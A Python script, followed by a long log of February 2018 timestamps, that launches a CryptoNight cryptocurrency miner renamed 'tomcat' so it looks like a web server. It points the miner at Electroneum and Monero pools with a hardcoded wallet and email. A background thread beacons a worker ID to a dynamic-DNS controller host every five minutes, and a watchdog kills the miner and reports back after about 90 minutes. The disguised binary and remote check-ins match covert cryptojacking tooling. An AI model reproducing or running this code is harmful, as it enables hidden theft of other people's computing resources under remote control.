import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:04.042324
#2018-02-17 16:46:05.173972
#2018-02-17 18:37:01.875971
#2018-02-17 20:25:04.776250
#2018-02-17 22:11:06.596798
#2018-02-17 23:55:07.024447
#2018-02-18 01:46:05.219541
#2018-02-18 03:33:04.857712
#2018-02-18 05:21:05.312729
#2018-02-18 07:12:07.895457
#2018-02-18 09:01:07.165648
#2018-02-18 10:47:07.270584
#2018-02-18 12:31:05.947657
#2018-02-18 14:18:02.108698
#2018-02-18 16:08:05.413623
#2018-02-18 17:56:05.802875
#2018-02-18 19:42:08.059335
#2018-02-18 21:27:01.397625
#2018-02-18 23:16:02.006219
#2018-02-19 01:02:06.564253
#2018-02-19 02:49:07.575817
#2018-02-19 04:37:05.265452
#2018-02-19 06:22:03.878251
#2018-02-19 08:11:01.950287
#2018-02-19 10:01:02.180422
#2018-02-19 11:50:08.933421
#2018-02-19 13:37:09.101592
#2018-02-19 15:24:01.935149
#2018-02-19 17:12:08.049500
#2018-02-19 18:59:01.854853
#2018-02-19 20:44:04.221351
#2018-02-19 22:31:06.931735
#2018-02-20 00:16:05.073175
#2018-02-20 02:03:06.594885
#2018-02-20 03:53:06.296998
#2018-02-20 05:36:07.161209
#2018-02-20 07:21:06.568775
#2018-02-20 09:07:04.175428
#2018-02-20 10:50:10.972770
#2018-02-20 12:37:06.816126
#2018-02-20 14:24:06.615414
#2018-02-20 16:08:05.719369
#2018-02-20 17:54:10.706664
#2018-02-20 19:46:08.293502
#2018-02-20 21:42:04.994999
#2018-02-20 23:24:08.107521
#2018-02-21 01:09:05.409254
#2018-02-21 02:57:02.074186
#2018-02-21 04:46:07.814459
#2018-02-21 06:34:05.833462
#2018-02-21 08:21:01.741600
#2018-02-21 10:06:07.831054
#2018-02-21 11:54:10.468829
#2018-02-21 13:44:09.533468
#2018-02-21 15:31:04.387908
#2018-02-21 17:20:08.514556
#2018-02-21 19:07:05.854339
#2018-02-21 20:54:02.154838
#2018-02-21 22:39:05.152158
#2018-02-22 00:28:05.782372
#2018-02-22 02:18:01.796296
#2018-02-22 04:03:07.160740
#2018-02-22 05:48:06.802303
#2018-02-22 07:34:05.509690
#2018-02-22 09:22:01.723524
#2018-02-22 11:08:08.168605
#2018-02-22 12:56:01.652683
#2018-02-22 14:43:04.496527
#2018-02-22 16:27:06.078031
#2018-02-22 18:13:12.015873
#2018-02-22 20:02:05.518765
#2018-02-22 21:50:08.436509
#2018-02-22 23:37:06.633013
#2018-02-23 01:24:01.787102
#2018-02-23 03:10:01.752674
#2018-02-23 04:58:03.660324
#2018-02-23 06:44:01.951900
#2018-02-23 08:36:05.795690
#2018-02-23 10:49:09.081976
#2018-02-23 12:47:05.205929
#2018-02-23 14:32:07.962322
#2018-02-23 16:23:01.598311
#2018-02-23 18:09:09.571755
#2018-02-23 19:55:02.451196
#2018-02-23 21:38:07.873367
#2018-02-23 23:28:07.017616
#2018-02-24 01:19:01.874657
#2018-02-24 03:09:01.634059
#2018-02-24 04:55:07.086880
#2018-02-24 06:41:01.565627
#2018-02-24 08:30:07.730519
#2018-02-24 10:17:06.701897
#2018-02-24 12:12:07.857122
#2018-02-24 13:59:05.348743
#2018-02-24 15:50:08.710995
#2018-02-24 17:37:05.879727
#2018-02-24 19:23:04.913466
#2018-02-24 21:13:06.225244
#2018-02-24 23:48:08.137126
#2018-02-25 03:08:07.423388
#2018-02-25 07:06:01.491918